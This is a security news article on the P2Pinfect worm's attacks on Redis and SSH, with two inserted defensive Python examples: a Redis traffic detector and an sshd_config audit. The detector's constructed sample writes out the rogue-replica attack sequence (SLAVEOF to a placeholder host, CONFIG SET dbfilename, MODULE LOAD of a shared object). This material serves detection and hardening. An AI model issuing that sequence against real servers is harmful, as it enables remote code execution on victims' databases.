1 August 2023

New P2Pinfect botnet malware targets Redis servers


A novel strain of malware has been observed targeting susceptible Redis servers to ensnare them into a botnet.

Dubbed “P2Pinfect” by its developers, the malware is a peer-to-peer self-replicating worm that comes in versions for both Windows and Linux.

The P2Pinfect malware was first detailed by researchers at Palo Alto Networks’ Unit 42, who observed it exploiting CVE-2022-0543, a Lua sandbox escape that affects the Redis builds shipped in certain Debian and Ubuntu packages.

The worm uses a number of known Redis exploitation methods for initial access, according to researchers at Cado Security. In the attack Cado observed, the threat actor compromised one of the firm’s honeypots by abusing Redis’s replication feature.

“A common attack pattern against Redis in cloud environments is to exploit this feature using a malicious instance to enable replication. This is achieved via connecting to an exposed Redis instance and issuing the SLAVEOF command,” the researchers wrote in a technical report.
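The SLAVEOF abuse described above is normally the first step of a well-known "rogue replica" chain in which the attacker's instance then pushes a dump file whose name and directory were set with CONFIG SET and loads it as a module with MODULE LOAD. The following added example (my own detection code, not part of the article or of the Cado or Unit 42 reports) decodes a captured Redis client stream, in both RESP and Redis's inline command form, and flags those primitives while leaving benign commands and `SLAVEOF NO ONE` alone. The traffic is constructed for the example; `203.0.113.5` and `exp.so` are placeholders, not indicators from P2Pinfect.

```python
"""Decode Redis client traffic and flag rogue-replica primitives.

Constructed example; the sample stream is not a P2Pinfect capture.
"""


def encode_command(*args: str) -> bytes:
    """RESP multi-bulk encoding, as a Redis client library sends it."""
    out = [b"*%d\r\n" % len(args)]
    for a in args:
        b = a.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(out)


def decode_commands(stream: bytes) -> list[list[str]]:
    """Split a client->server byte stream into argv lists.

    Handles RESP arrays (*N / $len) and Redis' inline form
    ("SLAVEOF 203.0.113.5 6379\r\n"), which raw-socket exploits often use.
    A truncated trailing message raises ValueError instead of being
    silently dropped, so a detector never loses a partial command.
    """
    cmds: list[list[str]] = []
    pos = 0
    while pos < len(stream):
        if stream[pos:pos + 1] != b"*":
            # Inline command: one whitespace-separated line.
            end = stream.find(b"\r\n", pos)
            if end < 0:
                raise ValueError("truncated inline command")
            cmds.append(stream[pos:end].decode("utf-8", "replace").split())
            pos = end + 2
            continue
        end = stream.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("truncated array header")
        argc = int(stream[pos + 1:end])
        pos = end + 2
        argv: list[str] = []
        for _ in range(argc):
            if stream[pos:pos + 1] != b"$":
                raise ValueError(f"expected bulk string at offset {pos}")
            end = stream.find(b"\r\n", pos)
            if end < 0:
                raise ValueError("truncated bulk length")
            length = int(stream[pos + 1:end])
            start = end + 2
            if start + length + 2 > len(stream):
                raise ValueError("truncated bulk payload")
            argv.append(stream[start:start + length].decode("utf-8", "replace"))
            pos = start + length + 2
        cmds.append(argv)
    return cmds


def flag_abuse(cmds: list[list[str]]) -> list[str]:
    """One alert per command that matches the rogue-replica chain."""
    alerts: list[str] = []
    for argv in cmds:
        if not argv:
            continue
        name = argv[0].upper()
        sub = argv[1].upper() if len(argv) > 1 else ""
        if name in ("SLAVEOF", "REPLICAOF") and sub != "NO":
            # "SLAVEOF NO ONE" only stops replication; a host:port target
            # makes this server pull its dataset from that peer.
            port = argv[2] if len(argv) > 2 else "?"
            alerts.append(f"{name} -> replication redirected to {argv[1]}:{port}")
        elif name == "MODULE" and sub == "LOAD":
            path = argv[2] if len(argv) > 2 else "?"
            alerts.append(f"MODULE LOAD -> shared object {path} loaded into redis-server")
        elif name == "CONFIG" and sub == "SET" and len(argv) > 2 \
                and argv[2].lower() in ("dir", "dbfilename"):
            value = argv[3] if len(argv) > 3 else "?"
            alerts.append(f"CONFIG SET {argv[2]} -> dump location controlled ({value})")
    return alerts


def sample_stream() -> bytes:
    """Constructed traffic: one normal write, then the rogue-replica sequence."""
    return (
        encode_command("SET", "session:42", "ok")
        + encode_command("SLAVEOF", "203.0.113.5", "6379")
        + encode_command("CONFIG", "SET", "dbfilename", "exp.so")
        + b"MODULE LOAD ./exp.so\r\n"  # inline form, as a raw-socket exploit sends it
        + encode_command("SLAVEOF", "NO", "ONE")
    )


if __name__ == "__main__":
    for alert in flag_abuse(decode_commands(sample_stream())):
        print(alert)
```

Running the script prints three alerts: the SLAVEOF redirect, the CONFIG SET and the MODULE LOAD. On a real deployment the same logic applies to a pcap or proxy log of port 6379; the corresponding hardening is to bind Redis to private interfaces, keep `protected-mode yes`, set `requirepass`, and rename or disable SLAVEOF, REPLICAOF, CONFIG and MODULE with `rename-command` where the application does not need them.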

The primary payload is an ELF binary written in a mix of C and Rust, with the two joined through Rust’s foreign function interface (FFI). On execution it rewrites the host’s SSH configuration “to a near default state”, which turns password authentication back on and lets the attacker log in to the server over SSH.
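A "near default" sshd_config is dangerous precisely because OpenSSH's defaults allow password and keyboard-interactive authentication; the binary does not need to add weak settings, only to remove the hardened ones. The following added example (my own audit code, not from the article or from Cado's report) reads an sshd_config with sshd's own semantics, first value wins and anything after a `Match` line is conditional, fills in the OpenSSH defaults for absent keywords, and reports every deviation from a hardened baseline. Both sample configurations are constructed for the example.

```python
"""Audit an sshd_config for the settings a 'reset to defaults' would weaken.

Constructed example; the two sample configs are not taken from P2Pinfect.
"""
import re

# OpenSSH's built-in values when the keyword is absent from the file.
OPENSSH_DEFAULTS = {
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "pubkeyauthentication": "yes",
    "permitemptypasswords": "no",
}

# Hardened baseline assumed for this example (adjust to local policy).
HARDENED_BASELINE = {
    "passwordauthentication": {"no"},
    "kbdinteractiveauthentication": {"no"},
    "permitrootlogin": {"no"},
    "pubkeyauthentication": {"yes"},
    "permitemptypasswords": {"no"},
}

# Deprecated spelling still accepted by sshd; normalise it to the new name.
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}

_LINE = re.compile(r"^(\S+?)(?:\s*=\s*|\s+)(.*)$")


def parse_sshd_config(text: str) -> dict[str, str]:
    """Effective global values. sshd keeps the FIRST value it reads for a
    keyword, and directives after a Match line apply only to matching
    connections, so parsing stops there."""
    effective: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _LINE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip().lower()
        if key == "match":
            break
        key = ALIASES.get(key, key)
        effective.setdefault(key, value)
    return effective


def audit(text: str) -> list[str]:
    """Return one finding per keyword whose effective value is off-baseline,
    saying whether it was set explicitly or fell back to the OpenSSH default."""
    effective = parse_sshd_config(text)
    findings: list[str] = []
    for key, allowed in HARDENED_BASELINE.items():
        got = effective.get(key, OPENSSH_DEFAULTS[key])
        if got not in allowed:
            source = "set explicitly" if key in effective else "OpenSSH default, keyword absent"
            findings.append(f"{key}={got} ({source}); expected {sorted(allowed)}")
    return findings


# Constructed hardened config, including a Match block whose override
# must not be mistaken for the global value.
HARDENED = """\
# constructed example
Port 22
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitRootLogin no
PubkeyAuthentication yes
PermitEmptyPasswords no
Match Address 10.0.0.0/8
    PasswordAuthentication yes
"""

# Constructed 'near default' rewrite: hardening keywords simply vanish,
# so OpenSSH defaults take over, and root login is turned on.
TAMPERED = """\
# constructed example
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PubkeyAuthentication yes
"""


if __name__ == "__main__":
    for finding in audit(TAMPERED):
        print(finding)
```

Running the script against `TAMPERED` reports three findings: password authentication and root login set explicitly, and keyboard-interactive authentication reverting to its default because the keyword is gone. Pair a check like this with a hash of the file and of `authorized_keys` so that a rewrite is noticed even when the values happen to match.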

“P2Pinfect is well-designed and utilizes sophisticated techniques for replication and C2. The choice of using Rust also allows for easier portability of code across platforms (with the Windows and Linux binaries sharing a lot of the same code), while also making static analysis of the code significantly harder. This is due to the complexity of Rust itself, the inclusion of C code due to the Foreign Function Interface feature, and the lack of tooling available for analysis,” the researchers concluded.

